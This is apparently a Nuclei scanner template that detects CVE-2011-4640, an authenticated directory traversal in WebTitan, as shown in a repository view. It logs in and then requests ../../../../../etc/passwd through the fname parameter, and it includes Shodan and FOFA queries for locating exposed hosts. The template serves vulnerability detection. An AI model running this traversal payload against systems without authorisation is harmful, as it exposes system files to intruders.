nuclei-templates/http/cves/2011/CVE-2011-4640.yaml

54 lines
1.7 KiB
YAML
Raw Normal View History

2023-10-06 06:06:38 +00:00
id: CVE-2011-4640
info:
2024-02-05 05:49:39 +00:00
name: WebTitan < 3.60 - Local File Inclusion
2023-10-06 06:06:38 +00:00
author: ctflearner
severity: medium
2023-10-08 07:35:56 +00:00
description: |
Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.
2023-10-06 06:06:38 +00:00
reference:
- https://www.exploit-db.com/exploits/37943
2024-02-05 05:49:39 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2011-4640
2023-10-06 06:06:38 +00:00
classification:
2023-10-08 07:35:56 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
cvss-score: 4
2023-10-06 06:06:38 +00:00
cve-id: CVE-2011-4640
cwe-id: CWE-22
2024-05-31 19:23:20 +00:00
epss-score: 0.05544
epss-percentile: 0.93225
cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:*
2024-02-05 05:49:39 +00:00
metadata:
max-request: 3
2024-03-27 22:08:12 +00:00
vendor: spamtitan
2024-05-31 19:23:20 +00:00
product: webtitan
2024-02-05 05:49:39 +00:00
shodan-query: title:"WebTitan"
2024-05-31 19:23:20 +00:00
fofa-query: icon_hash=1090061843
2024-02-05 05:49:39 +00:00
tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated
2023-10-06 06:06:38 +00:00
http:
2024-02-05 05:49:39 +00:00
- raw:
- |
GET /login-x.php HTTP/1.1
Host: {{Hostname}}
2023-10-08 07:35:56 +00:00
2024-02-05 05:49:39 +00:00
- |
POST /login-x.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
2023-10-06 06:06:38 +00:00
2024-02-05 05:52:31 +00:00
jaction=login&language=en_US&username={{username}}&password={{password}}
2024-02-05 05:49:39 +00:00
- |
GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body_2, "success\":true")'
- 'contains(body_1, "WebTitan")'
- "regex('root:.*:0:0:', body)"
- 'status_code_3 == 200'
condition: and
# digest: 4a0a00473045022041d30c6c44480e0b6452ec13d45a918b1c58535eca3e62f6d421984463f22f6f022100972d7303e93712725ab70fa65837727b8aa45f4fc20ec041f4a33ac4e65cc228:922c64590222798bb761d5b6d8e72950